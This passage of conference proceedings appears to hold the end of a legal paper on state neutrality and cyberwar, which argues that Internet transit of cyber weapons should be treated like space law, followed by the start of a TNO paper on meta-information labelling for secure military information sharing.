development of conditions under which their neutrality was recognized by the belligerents and other<br />
conditions under which neutrality was lost. This paper addresses modern concepts of neutrality, and<br />
explores the potential for, and perhaps need to, change our concepts of neutrality in the context of<br />
cyberwar as information technologies change warfare as it was previously practiced.<br />
War is “a condition of armed hostility between States,” (Hyde 1945, p. 1686. Cited in Elsea &<br />
Grimmett 2007, p. 23) or “a contention, through the use of armed force, between states, undertaken<br />
for the purpose of overpowering another.” (von Glahn 1992. p. 669. Cited in Elsea & Grimmett 2007,<br />
p. 23) War is “an armed conflict, or a state of belligerence, between two factions, states, nations,<br />
coalitions or combinations thereof. Hostilities between the opponents may be initiated with or without<br />
a formal declaration by any of the parties that a state of war exists.” (Dupuy, p. 261) Marcus Tullius<br />
Cicero (106-43 BCE) famously said in an oration, Pro Tito Annio Milone ad iudicem oratio (Pro<br />
Milone), in defense of Titus Annius Milo, who had been accused of murdering Publius Clodius<br />
Pulcher, a political enemy, “Silent enim leges inter arma” (the law is silent in times of war), (Clark<br />
1907) but his assertion wasn’t true in antiquity, and isn’t true today.<br />
Except in limited conditions, war was made illegal by the Charter of the United Nations, which is a<br />
treaty among the world’s nations signed in the aftermath of World War II, a terrible conflict in which<br />
some fifty million (perhaps as many as eighty million) died worldwide. (White 2005) Article 2(4) of the<br />
Charter provides that, “All Members shall refrain in their international relations from the threat or use<br />
of force against the territorial integrity or political independence of any state, or in any other manner<br />
inconsistent with the Purposes of the United Nations.” However, Article 51 makes use of military force<br />
is permissible in self-defense, and Article 42 makes military force permissible if authorized by the<br />
Security Council.<br />
When military force is used, its use is subject to other treaties that limit the nature and extent of force<br />
that may be employed in achieving military objectives. Philosophers, statesmen and military<br />
221
Julie Ryan and Daniel Ryan<br />
commanders have struggled to balance the destructive forces of armed combat with national and<br />
international humanitarian concerns, (Kolb 1997, n. 3) leading to the twin concepts of jus ad bellum —<br />
“the conditions under which belligerents might justly resort to the use of armed force as a means of<br />
conflict resolution” (Hensel 2008, p. 5) — and jus in bello —“the conditions for the just employment of<br />
armed force at the strategic, operational and tactical levels during periods of armed hostilities” (Hensel<br />
2008, p. 5) — that together comprise the notions of just war. The notion of jus in bello (“justice in war”)<br />
was known to Sun Tzu in 4 th century BCE China. (Giles) Even, so, the concept of jus in bello was<br />
more slow to develop than jus ad bellum. In addition to the United Nations Charter, limitations on the<br />
use of military force include inter alia the Geneva Conventions and Protocols, and the Hague<br />
Conventions.<br />
2. Cyberwar<br />
As human beings have moved into cyberspace, they have begun to engage in all the usual types of<br />
human behavior, good and bad, allowed by the technology: communicating, working, contracting,<br />
playing, and socializing, as well as stealing, breaching contracts, engaging in tortious behavior, and<br />
invading other users’ privacy. Now, nation-states are looking at cyberspace as place to conduct<br />
warfare operations, and terrorists are examining the possibilities inherent in asymmetric attacks<br />
through cyberspace on critical infrastructures.<br />
The “nature” of cyberspace, however, differs in significant ways from the physical, electrical, chemical,<br />
and photonic properties of “real” space. Communications across the Internet take the form of packets<br />
containing addressing and administrative data as well as the intended bits being exchanged. ("What is<br />
a packet?") The paths taken by packets exchanged across the Internet are under the control of<br />
algorithms within the switches that relay the packets. (Tyson 2001) The paths are neither known to<br />
nor controllable by the users of the network.<br />
Traditional approaches developed in real space for responding to misbehavior are hampered in<br />
cyberspace by difficulties in attribution, and only a loose correlation exists between “location” in<br />
cyberspace and location of users and cyber equipment within traditional legal jurisdictions. These<br />
realities will certainly impact the development of weapons, strategies, doctrines and tactics for use in<br />
cyberwar and countering cyberterrorism. Nevertheless, nations will undoubtedly seek to exercise and<br />
enhance national power by means of information operations in cyberspace, and the laws of armed<br />
conflict that have served civilized nations well in real space must be examined to determine how they<br />
can be used, and if they must be changed, to meet the realities of cyberwar and cyberterrorism. This<br />
paper will specifically address the legal issues associated with nation-state neutrality as applicable to<br />
these new realities.<br />
3. Neutrality during periods of belligerency<br />
“Neutrality” refers to concepts in customary international law and treaty law concerning the nonparticipation<br />
of some nations in warfare when a state of belligerency exists among other nations. The<br />
laws of neutrality presuppose the coexistence of war and peace – belligerents and their allies at war<br />
with other belligerents and their allies, while diplomacy, commerce, communications and so forth<br />
continue with and among nations not involved in the belligerencies, both neutral states with other<br />
neutral nations and neutral states with the belligerents. (Neff 2000, p. 1. Cited by Kelsey 2008, p.<br />
1442) Neutrality is a “legal, temporary situation of one state in relation to a conflict between two or<br />
more states. Neutrality consists in not participating directly in the war, through not rendering<br />
assistance to any belligerent party.” (Osmanczyk & Mango 2004, A-F, p. 1547) It may be manifested<br />
by unilateral declaration or by entry into bilateral or multilateral treaties. Grotius identified two rules for<br />
neutrals: (1) neutrals should neither strengthen the position of a belligerent power with an unjust<br />
cause, nor hinder the position of a belligerent with a just cause, (Book III, Chapter XVII (III)(1))and (2)<br />
warring parties should be treated alike when the cause of the war is in doubt. (Book III, Chapter XVII<br />
(III)(1))<br />
Even before the second half of the 19th century when the laws of war began to be<br />
codified in multilateral treaties, some principles relating to the conduct of armed hostilities<br />
had been included in bilateral treaties.... The rights and duties of neutrality in war,<br />
especially at sea, have been addressed in a large number of bilateral treaties between<br />
states from at least the early 17th century. [Footnote 12: W. E. Hall, The Rights and<br />
Duties of Neutrals, Longman's Green, London, 1874, pages 27-46, in a chapter<br />
surveying the growth of the law affecting belligerent and neutral states to the end of the<br />
222
Julie Ryan and Daniel Ryan<br />
18th century, refers to "innumerable treaties" relating to neutrality that were concluded<br />
over several centuries (page 28).] Sometimes, following the conclusion of a bilateral<br />
treaty on neutrality, additional states proceeded [sic] to it. [Footnote 13: For example, on<br />
February 27, 1801 Denmark ceded to the convention between Russia and Sweden for<br />
the Reestablishment of an Armed Neutrality, which had been signed on 16 December<br />
1800. 55 CTS (1799-1801) 411-24.] (Roberts & Guelff 1982, p. 4)<br />
The law of neutrality was eventually codified in the Hague Conventions of 1907, including No. 3,<br />
Convention Relative to the Opening of Hostilities (requiring notice to neutrals of a state of war); No.<br />
11, Convention Relative to Certain Restrictions with Regard to the Exercise of the Right of Capture in<br />
Naval War; and especially No. 5, Convention Respecting Rights and Duties of Neutral Powers and<br />
Persons in Case of War on Land. (The Avalon Project)<br />
Having assumed a position of neutrality, a nation must not allow transit of military forces or equipment<br />
by belligerents across its land territory or the airspace above its land territory. The rules with respect<br />
to belligerent naval vessels, and aircraft flying over a neutral’s territorial waters and exclusive<br />
economic zones, are more complicated. The notion of transit passage applies to “straits which are<br />
used for international navigation between one part of the high seas or an exclusive economic zone<br />
and another part of the high seas or an exclusive economic zone.” (UNCLOS 1982, Art. 37) Ships and<br />
aircraft operated by belligerent nations may transit the territorial waters of a neutral state “solely for<br />
the purpose of continuous and expeditious transit of the strait . . . .” (UNCLOS 1982, Art. 38) During<br />
transit passage, ships and aircraft must: “proceed without delay . . ., refrain from any threat or use of<br />
force against the sovereignty, territorial integrity or political independence of States bordering the<br />
strait . . ., and refrain from any activities other than those incident to their normal modes of continuous<br />
and expeditious transit unless rendered necessary by force majeure or by distress.” (UNCLOS 1982,<br />
Art. 39)<br />
The notion of innocent passage applies to passage through the territorial waters of a neutral state and<br />
is permitted “so long as it is not prejudicial to the peace, good order or security of the coastal State.”<br />
(UNCLOS 1982, Art. 19) Passage is not innocent if it involves “any threat or use of force against the<br />
sovereignty, territorial integrity or political independence of the coastal State . . ., any exercise or<br />
practice with weapons of any kind, . . . any act of propaganda aimed at affecting the defence or<br />
security of the coastal State, . . . the launching, landing or taking on board of any aircraft [or] military<br />
device, [or] any act aimed at interfering with any systems of communication or any other facilities or<br />
installations of the coastal State.”(UNCLOS 1982, Art. 19)<br />
Once a state decides on a position of neutrality, it must take steps to prevent its territory<br />
from becoming a base for military operations of a belligerent. It must prevent the<br />
recruiting of military personnel, the organizing of military expeditions, and the<br />
constructing, outfitting, commissioning, and arming of warships for belligerent use. A<br />
neutral state is under no obligation to prevent private persons or companies from<br />
advancing credits or selling commodities to belligerents. Such sales are not illegal under<br />
the international law of neutrality. A neutral state may, if it chooses, go beyond the<br />
requirements of international law by placing an embargo upon some or all sales or<br />
credits to belligerents by its nationals. If it does so, it has the obligation to see that<br />
legislation, commonly referred to as neutrality laws, is applied impartially to all<br />
belligerents. Once enacted, neutrality laws are not to be modified in ways that would<br />
advantage one party in the war. (Neutrality 2008)<br />
There is a limited communications exception in the law of neutrality for communications by<br />
belligerents and their allies across the land territory of neutral states. Hague Convention V, Article 8,<br />
provides, “A neutral Power is not called upon to forbid or restrict the use on behalf of the belligerents<br />
of telegraph or telephone cables or of wireless telegraphy apparatus belonging to it or to companies<br />
or private individuals.” The Internet did not exist when the Hague Conventions were written, of course,<br />
but arguably this exception applies to Internet communications as well as telegraph and telephone<br />
communications. The nature and scope of this exemption is a key issue for neutrality in the context of<br />
cyberspace.<br />
4. Neutrality in the context of cyberwar<br />
When Hague V(8) was written, communications across the territory of a neutral nation via telegraph or<br />
telephone cables, or by wireless telegraphy, might have involved passing a variety of types of<br />
information. Command and control information might have been passed, for example, or intelligence<br />
223
Julie Ryan and Daniel Ryan<br />
or targeting information. Assuming that military units knew their own locations (not, necessarily, a<br />
reasonable assumption in those days), unit locations may have been reported. In short, information<br />
useful in prosecuting the belligerency, if it could be reduced to textual or numeric form suitable for<br />
transmission across the communications systems in use at that time, could be transmitted without<br />
imposing a burden on the neutral state to recognize or interdict the transmission. Some information<br />
may have been encoded or enciphered, and transmission would have necessarily been slow by<br />
today’s standards, but fast relative to other media and transmission capabilities available at the time<br />
(foot, horseback, railroad, ship). (Lail 2002, p. 4)<br />
Fast forward to the twenty-first century, and the ability to pass useful information across the Internet is<br />
much enhanced. Now not just text and numbers may be communicated, but sound to at least the<br />
level of voice recognition, imagery including high-quality color pictures, and measurement and<br />
telemetry data, such as GPS data, can be communicated quickly and easily across the Internet.<br />
Perhaps more importantly, tools and even weapons themselves, perhaps in the form of malware, can<br />
be moved across the territory of neutrals and belligerents alike using the Internet. Those engaged in<br />
such Internet communications do not and, for the most part cannot, know the path the packets<br />
comprising their communications will take, much less can they control the path. In fact, some of the<br />
packets may take different paths from other packets that are part of the same transmission, all<br />
transparent to and beyond the control of those engaged in the communication.<br />
Historically, warfare has involved the use of kinetic weapons (e.g. projectiles) to kill and destroy.<br />
Modern warfare continues to use kinetic weapons, but may also use energy weapons – lasers, for<br />
example; but note that Protocol IV of the 1980 Convention on Certain Conventional Weapons<br />
specifically outlaws the use of blinding lasers – or may use logic weapons to attack and defend cyberdependent<br />
infrastructures. In a modern warfare, information operations may be used in connection<br />
with kinetic operations (as in the confrontation between Russia and Georgia in 2008), (Tikk 2010, p.<br />
66ff) or can be used without ancillary kinetic operations (as in the confrontation between Russia and<br />
Estonia in 2007). (Tikk 2010, p. 14ff) It is highly probable that we will never again see kinetic<br />
operations of any great extent without a cyber component. Whether information operations among<br />
nation-states without “armed conflict” will be deemed to be warfare probably depends upon the level<br />
of destruction realized. (Article 51 of the United Nations Charter uses the expression “armed attack” to<br />
justify war in self-defense by nation-states. However, the expression is not defined. It is not clear that<br />
it is proper, or desirable, to view a purely cyber incident as an armed attack. See Wingfield 2006, p.<br />
12. See also Sullivan 2010) Information operations among, between or with non-nation-states cannot,<br />
by definition, be war, regardless of the level of destruction attained or the used of uniformed military<br />
personnel by one side or another and despite the common misuse of the term in referring to conflicts<br />
that are not between or among nation-states, as in “the global war on terror” (Rumsfeld Memo 16<br />
October 2003) or the “war on drugs.” (Testimony of OMB Director Nussle)<br />
While belligerents’ use of networks that cross a neutral’s territory can take place without violating the<br />
neutrality status of the nations through whose territory the communications pass, Hague V(8) arguably<br />
did not foresee that that use might include weapons. The rules concerning neutrality require that<br />
passage of weapons or other military materials and equipment across the territory of a neutral must<br />
be interdicted by the neutral state, and if it fails to do so, or is unable to do so, the belligerents against<br />
whom the weapons or materials are to be used have a legal right to attack the transfer. (Brown 2006,<br />
p. 210) Hague V(1) forbids land transfers and Hague V(2) forbids use of the atmosphere. Some<br />
analysts have, therefore, concluded that cyberwar is not permitted under current neutrality law without<br />
a likely violation of the claimed neutrality. (Kelsey2008, pp. 1441-6) They recommend changes to<br />
bring the law into conformance with the reality of Internet transfers. (Kelsey 2008, pp. 1448-9) One<br />
recommendation would focus on intent: the rules of neutrality would not be violated unless the<br />
belligerent intended to use the information infrastructure of the neutral to deliver the weapons. The<br />
neutral would not have to interdict an unintentional passage, and would not be subject to attack by the<br />
other side based on an unintentional crossing of its territory by the cyber weapons. (Kelsey 2008, pp.<br />
1448-9) This approach seems hopeless to us. The neutral probably has no knowledge that weapons<br />
are passing across its territory, could realistically do nothing if it did know, and has even less access<br />
to knowledge of the belligerent’s intent with respect to the crossing.<br />
However, there is an alternative approach to framing the problem and it’s solution. Extra-atmospheric<br />
movements of weapons (other than nuclear weapons) and military materials above the territory of<br />
neutrals is permitted without imposing a duty on the neutral to interdict. The United Nations adopted a<br />
224
Julie Ryan and Daniel Ryan<br />
“Declaration of Legal Principles Governing the Activities of States in the Exploration and Use of Outer<br />
Space” in 1963 (Wolter 2003, p. 4) The Declaration has since been supplemented by three<br />
resolutions laying down the legal principles applicable to the exploration and exploitation of outer<br />
space, a “Declaration on International Cooperation in the Exploration and Use of Outer Space for the<br />
Benefit and in the Interest of All States, Taking into Particular Account the Needs of Developing<br />
Countries,” and five treaties and agreements governing the use of space and space-related activities.<br />
(United Nations Treaties and Principles on Space Law ) These treaties, agreements and principles<br />
are collectively known as the “United Nations Treaties and Principles in Outer Space.” Nuclear<br />
weapons are forbidden, but other weapons (kinetic weapons, lasers) are permitted. (Although nuclear<br />
weapons are banned, it is recognized that some uses of nuclear power are needed in space, the<br />
Treaties and Principles provide for safety in its use, mitigation of risks, and liability for states that fail to<br />
control the nuclear power or its sources.)<br />
The very nature of outer space is such that spacecraft do not have the same ability to control their<br />
flight paths that aircraft operating within the atmosphere have, (Braeunig 1997-2008) and the cost of a<br />
space program that could interdict is large, (Fox 2007) so a rule requiring interdiction of belligerents’<br />
weapons in space by the neutral does not make sense. Spacecraft and satellites in orbit pass above<br />
both belligerents and neutrals and cannot avoid doing so, being subject to the laws of celestial<br />
mechanics. Accordingly, the notions of territorial control that apply in the laws of the sea and the<br />
regulation of aircraft, cannot apply in outer space. If neutrals were required to exercise control over<br />
the use of outer space in the same way they exercise control over air traffic in the skies above their<br />
territories, it would be practically impossible to maintain neutrality at all.<br />
Similarly, recognizing the impossibility of neutrals interdicting belligerent Internet use of the neutral’s<br />
information infrastructure without prohibitive costs or unacceptable consequences for the neutral’s licit<br />
use of its own infrastructure: "a state may not be able to prevent [cyber] attacks from leaving its<br />
jurisdiction unless it severs all connections with computer systems in other states." (Brown 2006, p.<br />
210) This indicates that the appropriate rule for Internet use is more like the rule for space than the<br />
rule for air or land traffic, even when the use involves cyber weapons or information useful to the<br />
belligerent for military purposes (telemetry, GPS, weather data, etc.). Such acceptable use would, of<br />
course, apply to all belligerents, because the rules of neutrality prohibit the neutral state favoring one<br />
side in any way over the other side. (Brown 2006, p. 211)<br />
5. Conclusion<br />
Phillip Jessup, in 1936, concluded, "There is nothing new about revising neutrality; it has undergone<br />
an almost constant process of revision in detail." (Jessup 1935-6, p. 156. Cited in Walker 2000, p.<br />
109) With the advent of cyberwar, rules governing neutrality during periods of belligerency need to be<br />
reconsidered and revised yet again. The realities of the Internet age mean that weapons as well as<br />
information can move across communications networks in ways that were not possible or foreseeable<br />
during the earlier evolution of the laws of war and neutrality. Yet the paths that those weapons will<br />
take as they traverse the Internet on the way to their intended targets are beyond the knowledge or<br />
control of the belligerents that launch them. Detection, identification and interdiction by neutrals<br />
across whose territories the weapons may pass are impractical without sacrificing the utility of the<br />
networks for licit use by the neutrals and others, hence impossible.<br />
However, it is the only the details of the rules of neutrality that must change. Neutrals will not be<br />
required to do what they cannot do, and will not be subject to attack when they do not detect, identify<br />
and interdict the flow of weapons through their information infrastructures. The key principle of<br />
neutrality requiring that neutrals do not knowingly and willingly participate in the belligerency, or favor<br />
one side over the other, can and must be retained.<br />
Disclaimer: Opinions expressed in this paper are those of the authors and do not represent positions<br />
of George Washington University, or of the Information Resources Management College, the National<br />
Defense University, the Department of Defense, or the United States Government.<br />
References<br />
The Avalon Project: Documents in Law, History and Diplomacy. Yale Law School, Lillian Goldman Law Library.<br />
http://avalon.law.yale.edu/default.asp.<br />
Boot, Max (2006) War Made New: Technology, Warfare, and the Course of History, 1500 to Today. New York:<br />
Gotham Books.<br />
225
Julie Ryan and Daniel Ryan<br />
Braeunig, Robert A. (1997-2008) Orbital Mechanics. http://www.braeunig.us/space/orbmech.htm.<br />
Brown, Davis, A Proposal for an International Convention To Regulate the Use of Information Systems in Armed<br />
Conflict, 47 Harv. Int'l L.J. 179 (2006).<br />
Clark, A. C. (1907) Q. Asconii Pediani Orationum Ciceronis Quinque Enarratio.<br />
http://www.attalus.org/latin/asconius2.html#Milo.<br />
Dupuy, Trevor N. et al. eds. (2003) Dictionary of Military Terms, 2 nd Ed. New York: H.W. Wilson.<br />
Elsea, Jennifer K. & Grimmett, Richard F. (2007) Declarations of War and Authorizations for the Use of Military<br />
Force: Historical Background and Legal Implications. Washington, DC: Congretional Research Service<br />
RL31133. http://www.fas.org/sgp/crs/natsec/RL31133.pdf.<br />
Fox, Bernard et al. (2007) Guidelines and Metrics for Assessing Space System Cost Estimates. Santa Monica,<br />
CA: Rand Corporation. http://www.rand.org/pubs/technical_reports/2008/RAND_TR418.pdf.<br />
The Gale Group, Inc. (2008) West's Encyclopedia of American Law, Edition 2. Farmington Hills, MI: Thomson<br />
Gale. http://legal-dictionary.thefreedictionary.com/neutrality.<br />
Gat, Azar (2006) War in Human Civilization. Oxford: Oxford University Press.<br />
Giles, Lionel (1910) Sun Tzu on the Art of War. http://www.chinapage.com/sunzi-e.html.<br />
Grotius, Hugo (1925) Du Jure Belli ac Pacis [Of the Law of War and Peace]<br />
Libri Tres. Oxford: Clarendon Press. [Reproduced as a Special Edition (1984) Birmiingham, AL: Legal Classics<br />
Library.] In particular, see Chapter XVII: On Those Who Are of Neither Side in War.<br />
Hall, W. E. (1874) The Rights and Duties of Neutrals, Longman's Green, London.<br />
Hague Convention (V) respecting the Rights and Duties of Neutral Powers and Persons in Case of War on Land.<br />
The Hague, 18 October 1907. http://www.icrc.org/ihl.nsf/FULL/200?OpenDocument.<br />
Hensel, Howard M. (2008) Legitimate Use of Military Force. Surrey, UK:Ashgate Publishing Group.<br />
Hyde, Charles C. (1945) International Law Chiefly as Interpreted and Applied by the<br />
United States, Vol. 3. New York: Hachette Book Group USA (Little Brown & Co.).<br />
International Humanitarian Law - Treaties & Documents by Date. International Committee of the Red Cross.<br />
http://www.icrc.org/ihl.nsf/INTRO?OpenView.<br />
Jessup, Phillip and Deák, Francis (1935-6) Neutrality, Its History, Economics and Law: Vol. IV Today and<br />
Tomorrow. New York: Columbia University Press.<br />
Johnson, Phillip A., et al. (May, 1999) An Assessment of International Legal Issues in Information Operations.<br />
Washington, DC: Department of Defense Office of General Counsel.<br />
Kastenberg, Jushua E. (2009) “Non-Intervention and Neutrality in Cyberspace: An Emerging Principle in the<br />
National Practice of International Law.” 64 A.F. L. Rev. 43.<br />
Keegan, John (1993) A History of Warfare. New York: Alfred A. Knopf.<br />
Kelsey, Jeffrey T. G. (2008) “Hacking into International Humanitarian Law: The Principles of Distinction and<br />
Neutrality in the Age of Cyber Warfare.” 106 Mich. L. Rev. 1427.<br />
Lauterpacht, Hersch, Oppenheim's International Law (7th Ed., 1948) London: Longmans, Green & Co.<br />
Kolb, Robert (1997) “Origin of the twin terms jus ad bellum/jus in bello,” International Review of the Red<br />
Cross, No. 320, p.553-562. Online at<br />
http://www.icrc.org/web/eng/siteeng0.nsf/iwplist163/d9dad4ee8533daefc1256b66005affef.<br />
Lail, Benjamin (2002) Broadband Network and Device Security. Sydney: McGraw-Hill. http://books.mcgrawhill.com/downloads/products/0072194243/0072194243_ch01.pdf.<br />
Neff, Stephen C. (2000) The Rights and Duties of Neutrals. Manchester, UK: Manchester University Press.<br />
Neutrality. (2008) West's Encyclopedia of American Law, Edition 2. http://legaldictionary.thefreedictionary.com/neutrality.<br />
Osmanczyk, Edmund Jan & Mango, Anthony (2004) Encyclopedia of the United Nations and International<br />
Agreements. Florence, Kentucky: Routledge.<br />
Roberts, Adam and Guelff, Richard (1982) Documents on the Laws of War, 3d Ed. Oxford: Oxford University<br />
press.<br />
“Rumsfeld Memo 16 October 2003” (2008) SourceWarch.<br />
http://www.sourcewatch.org/index.php?title=Rumsfeld_Memo_16_October_2003<br />
Sullivan, Bob (2010) “Could Cyber Skirmish Lead U. S. to War?” http://redtape.msnbc.com/2010/06/imagine-thisscenario-estonia-a-nato-member-is-cut-off-from-the-internet-by-cyber-attackers-who-besiege-the-countrysbandw.html<br />
“Testimony of OMB Director Nussle” (2008) The White House.<br />
http://www.whitehouse.gov/omb/legislative_testimony_director_nussle_021308<br />
Tikk, Eneken et al. (2010) International Cyber Incidents: Legal Considerations. Tallinn: Cooperative Cyber<br />
defence Center of Excellence.<br />
Tyson, Jeff. (April 3, 2001) "How Internet Infrastructure Works" HowStuffWorks.com.<br />
http://computer.howstuffworks.com/internet/basics/internet-infrastructure.htm<br />
United Nations Convention on the Law of the Sea (UNCLOS), (1982)<br />
http://www.un.org/Depts/los/convention_agreements/convention_overview_convention.htm.<br />
United Nations Convention on Prohibitions or Restrictions on the Use of Certain Conventional Weapons Which<br />
May Be Deemed to Be Excessively Injurious or to Have Indiscriminate Effects, Protocol IV (1980).<br />
http://www.un.org/millennium/law/xxvi-18-19.htm.<br />
United Nations Treaties and Principles on Space Law (2010)<br />
http://www.unoosa.org/oosa/en/SpaceLaw/treaties.html<br />
226
Julie Ryan and Daniel Ryan<br />
von Glahn, Gerhard (1992) Law Among Nations: An Introduction to Public International Law (<strong>6th</strong> ed.) New York:<br />
Macmillan.<br />
Walker, George K. (November, 2000) “Information Warfare and Neutrality.” 33 Vand. J. Transnat'l L. 1079.<br />
"What is a packet?" (December 1, 2000) HowStuffWorks.com.<br />
http://computer.howstuffworks.com/question525.htm<br />
White, Matthew (2005) Source List and Detailed Death Tolls for the Twentieth Century Hemoclysm.<br />
http://users.erols.com/mwhite28/warstat1.htm.<br />
Wingfield, Thomas C. (2006) “When is a Cyberattack an ‘Armed Attack?’ Legal Thresholds for Distinguishing<br />
Military Activities in Cyberspace.” Cyber Conflict Studies Association.<br />
http://www.docstoc.com/docs/445063/when-is-a-cyberconflict-an-armed-conflict<br />
Wolter, Detlev (2003) Common Security in Outer Space and International Law: A <strong>European</strong> Perspective.<br />
(Geneva: United Nations, UNIDIR/2005/29, 2006)<br />
227
Labelling: Security in Information Management and<br />
Sharing<br />
Harm Schotanus, Tim Hartog, Hiddo Hut and Daniel Boonstra<br />
TNO Information and Communication Technology, Delft, The Netherlands<br />
Harm.schotanus@tno.nl<br />
Tim.hartog@tno.nl<br />
Hiddo.hut@tno.nl<br />
Daniel.boonstra@tno.nl<br />
Abstract: Military communication infrastructures are often deployed as stand-alone information systems<br />
operating at the System High mode. Network-Enabled Capabilities (NEC) and combined military operations lead<br />
to new requirements for information management and sharing which current communication architectures cannot<br />
deliver. This paper informs information architects and security specialists about an incremental approach<br />
introducing labelling of documents by users to facilitate information management and sharing in security related<br />
military scenarios.<br />
Keywords: labelling, meta-information, information security, cross-domain solutions, information sharing, needto-protect,<br />
duty-to-share<br />
1. Introduction<br />
This paper presents an overview of the steps to develop a meta-information capability. First, it<br />
presents a broad overview on what meta-information and labelling is and how it can be applied. Then<br />
it focuses on one specific security application of labelling which is secure information exchange, i.e.<br />
selective and regulated information sharing, based on meta-information. We also present a possible<br />
roadmap for implementing a secure information sharing capability based on meta-information. The<br />
purpose of this roadmap is to analyse what ‘ingredients’ are required for implementing such a<br />
capability, i.e. the problems we have identified and the technology that is necessary to solve these<br />
problems.<br />
The importance of sharing information in networked military operations, especially coalition networks,<br />
is commonly recognised. An important driver for future communication architectures is (NATO)<br />
Network-Enabled Capabilities (NNEC)(Buckman 2005). The integrated and coordinated deployment<br />
of all capabilities within a coalition is the central goal relying heavily upon regulated information<br />
sharing (Schotanus 2009)(Martis 2006). Better integrated communication architecture contributes to<br />
sharing of relevant military information by making it easier and quicker. But how does confidentiality fit<br />
into this picture? What if a coalition partner does not want to share specific information because<br />
sharing poses a bigger risk for them or for the mission than not sharing or vice versa? Which methods<br />
are available to differentiate between information to-be-shared and information not-to-be-shared? The<br />
primary objective is that the owner of the information remains in control of that information.<br />
Relevant information produced during military coalition operations usually does not originate from a<br />
single partner but is the result of multiple partners working together using some form of online or<br />
offline shared information mechanism like documents distributed via e-mail or digital photos shared<br />
via situational awareness applications. Information is nowadays typically divided amongst the coalition<br />
partners, each creating a separate information domain in which the information is stored and<br />
processed. Such an information domain is usually a standalone network. Transferring information<br />
from one domain is handled often by out-of-band means That may cause more problems than it<br />
solves as there is little control over the information exchange. Connecting these different domains is a<br />
step that is currently taken, but also leads to many problems. Not in the least because of different<br />
responsibilities for each of these domains. Information sharing without compromising the<br />
confidentiality is a problem that has to be solved by choosing an information management strategy<br />
that is based on the ability to regulate the sharing of information and that cannot be addressed by<br />
infrastructural solutions. In essence, this is caused by the inability of the infrastructure to determine<br />
the value of the information and hence it cannot enforce decisions about whether information can or<br />
cannot be shared with the intended partner.<br />
228
Harm Schotanus et al.<br />
In the remainder of this paper we will often use the term information domain. This is defined as a<br />
collection of information under one responsibility (e.g. a nation, or organisation) that operates for a<br />
single purpose (e.g. a mission) and has a single security policy.<br />
2. Meta-information and labelling<br />
A new information management strategy could be based on mechanisms that make decisions based<br />
on meta-information instead of on the information itself. By adding relevant meta-information, the user<br />
can effectively control on what conditions information can be released.<br />
Meta-data or meta-information is information about information. For example, a military security<br />
marking (such as NATO SECRET) on the top and bottom of each page of a document is a form of<br />
meta-information because it conveys the classification of the document, in other words it is (security<br />
specific) meta-information about other information. To enable regulated sharing of information<br />
between different information domains or with partners in a coalition, meta-information can be used to<br />
describe certain properties of information objects. These properties can be used to enforce decisions<br />
in a release mechanism whether information should or should not be shared. The meta-information is<br />
often called a label, and the process of creating a label is called labelling. This reflects two important<br />
concepts:<br />
Sharing information between coalition partners presumes a way of deciding whether a specific<br />
information object may or may not be shared.<br />
For each information object a set of properties can be determined that can form a basis decision<br />
process for sharing information.<br />
The crucial concept in our labelling approach is that we separate the logic to enforce decisions from<br />
the intelligence to determine the properties of the information. This means we can reduce the<br />
complexity of the decision making process.<br />
2.1 Examples of meta-information<br />
The use of properties of the information in addition to the original information, creates new<br />
possibilities. If information objects such as files carry meta-information, for example the type-of-file<br />
(presentation, document or image), file extension (ppt, doc, pdf, jpg), author, security marking, timeof-creation,<br />
then these meta-information properties can be used for making decisions in several<br />
scenarios [see Figure 1].<br />
Figure 1: Examples of information with their meta-information<br />
Because our aim is to both facilitate regulated sharing mechanisms and to present the power and<br />
flexibility of meta-information, we categorised these new possibilities in two categories: use cases<br />
within a single information domain and use cases in federated information domains.<br />
Many software applications already store meta-information within information objects. Image files for<br />
example carry resolution information while photos carry the camera manufacturer and model that was<br />
used to take the photo. One problem with proprietary file formats and closed-source applications (e.g.<br />
Microsoft Word) is that the meta-information cannot be easily accessed outside the native software<br />
application because the file is a black box. A second problem is that each file format will have its own<br />
approach to storing meta-information. That implies that a labelling solution has to be adjusted for<br />
every format. A solution for this problem is an application-independent approach where information is<br />
stored in a separate object. Storing meta-information separately from information objects in a<br />
standardised format also improves the flexibility to work with meta-information without having to<br />
depend on the knowledge of the file format or implementation in software.<br />
In certain use-case scenarios where third parties need to process another one’s meta-data, a<br />
standardized specification for conveying the meta-data is needed. NATO has proposed a standard<br />
based on XML labelling (Eggen 2010)(Oudkerk 2010). On september 1 st 2009 POWDER (Protocol for<br />
Web Description Resources) became a W3C recommendation (POWDER 2009). The POWDER suite<br />
229
Harm Schotanus et al.<br />
facilitates the publication of descriptions of (multiple) resources. The goal of the POWDER working<br />
group has been to develop a mechanism that allows not only the provision of descriptions but also a<br />
way to apply them to groups of (online) resources and for the authentication of those descriptions in<br />
relation to establishing a trust level of those descriptions.<br />
2.2 Possibilities of meta-information within a single network<br />
2.2.1 Information Lifecycle Management<br />
Information Lifecycle Management is about the different lifecycle phases that information can go<br />
through, from the creation of information, via different manipulations or updates to the deletion of<br />
information or at least archiving the information for future reference. Easy accessible meta-information<br />
can facilitate Information Lifecycle Management and create new possibilities. For example, with more<br />
meta-information available, information objects could also be archived for different reasons. For<br />
example archive every file that was created by ‘Danielle Zeeg’ because she no longer works at the<br />
company or archive every information object that has been tagged as ‘SFOR’ because that mission<br />
has ended.<br />
Similar to the archiving scenario aiding users or administrators in searching for information can also<br />
benefit from having more meta-information available. For instance search all information objects that<br />
carry file extension ‘pdf’ and are created in 2010 and have been authored by ‘Kees de Witte’ and have<br />
been tagged with ‘SFOR’.<br />
2.2.2 Integrity protection<br />
It is also possible to embed integrity protection capabilities in meta-information. For example by<br />
creating a digital signature of the information, the signature can later be used to verify information has<br />
been changed or validate who created it. This kind of meta-information helps to protect information as<br />
any modifications to the information can be detected. If meta-information were to include integrity<br />
protection then users or administrators could for example find all data objects that were modified after<br />
the meta-information was generated. Another possibility would be to establish the trustworthiness of<br />
information by distinguishing between data objects that do or do not have integrity protection<br />
embedded in their meta-information.<br />
Meta-information can also be used for identification purposes. For example meta-information<br />
containing the type, manufacturer, location or capability of a specific hardware sensor deployed in the<br />
field can be used to select certain sensor feeds, i.e. select feeds of all sensors of type audio-sensor,<br />
or select feeds of all sensors that are located within a one-kilometre radius of GPS coordinate with<br />
latitude 50.84064 and longitude 4.35498.<br />
2.3 Possibilities of meta-information in a federated domain<br />
The different types of meta-information discussed in the previous paragraph may also be used in<br />
federated context. Not only to regulate information flows between different domains, but as we shall<br />
see, may have other possibilities too.<br />
